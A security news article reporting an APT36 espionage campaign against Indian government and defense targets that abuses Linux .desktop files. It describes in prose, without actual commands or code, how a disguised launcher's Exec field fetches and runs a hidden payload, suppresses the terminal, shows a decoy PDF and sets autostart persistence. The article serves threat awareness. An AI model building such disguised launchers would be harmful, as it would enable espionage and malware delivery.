APT36 Hackers Use Linux .desktop Files to Deploy Malware in Latest Campaign
▼ Summary
– APT36 is using malicious Linux .desktop files to target Indian government and defense entities for data exfiltration and persistent espionage.
– The attacks involve phishing emails with ZIP archives containing disguised .desktop files that execute hidden bash commands to fetch and run malware.
– The malware uses a hex-encoded payload from attacker-controlled servers or Google Drive and launches a decoy PDF to avoid suspicion.
– A Go-based ELF payload establishes persistence via cron jobs or systemd and communicates with a command server through a WebSocket channel.
– This campaign demonstrates APT36’s evolving tactics toward greater sophistication and evasion of Linux security tools.
A sophisticated cyber espionage campaign targeting Indian government and defense sectors has been uncovered, utilizing a clever manipulation of Linux .desktop files to deploy malware. Security firms CYFIRMA and CloudSEK have both documented this ongoing operation, which began in early August and continues to pose a significant threat to sensitive networks.
The attackers, identified as the Pakistani-linked group APT36, distribute phishing emails containing ZIP archives. Inside these archives, a malicious .desktop file is disguised as a PDF document, complete with a deceptive filename meant to trick users into opening it. These files, normally harmless application launchers in Linux environments, are weaponized to execute hidden commands.
When an unsuspecting user clicks the file, a bash command embedded in the ‘Exec=’ field triggers. This command retrieves a hex-encoded payload from a remote server, often hosted on Google Drive, and saves it to a temporary directory. The script then modifies the file’s permissions to make it executable and runs it discreetly in the background.
To avoid raising suspicion, the malware simultaneously launches Firefox to display a harmless decoy PDF, making the attack appear legitimate. Additional fields like ‘Terminal=false’ ensure no terminal window appears, while ‘X-GNOME-Autostart-enabled=true’ attempts to establish persistence by running the malicious file at every login.
This abuse of .desktop files mirrors how Windows LNK shortcuts have been exploited in the past. Because these files are plain-text and rarely flagged by security tools, they provide an effective method for delivering malware without detection.
The payload delivered in this campaign is a Go-based ELF executable designed for espionage. Despite being packed and obfuscated to hinder analysis, researchers confirmed its capabilities include hiding its presence, establishing persistence via cron jobs or systemd services, and communicating with a command-and-control server through a bidirectional WebSocket channel. This allows both data exfiltration and remote command execution.
This latest activity demonstrates APT36’s continued evolution toward more evasive and sophisticated attack methods, highlighting the need for increased vigilance around seemingly innocent file types in Linux environments.
(Source: Bleeping Computer)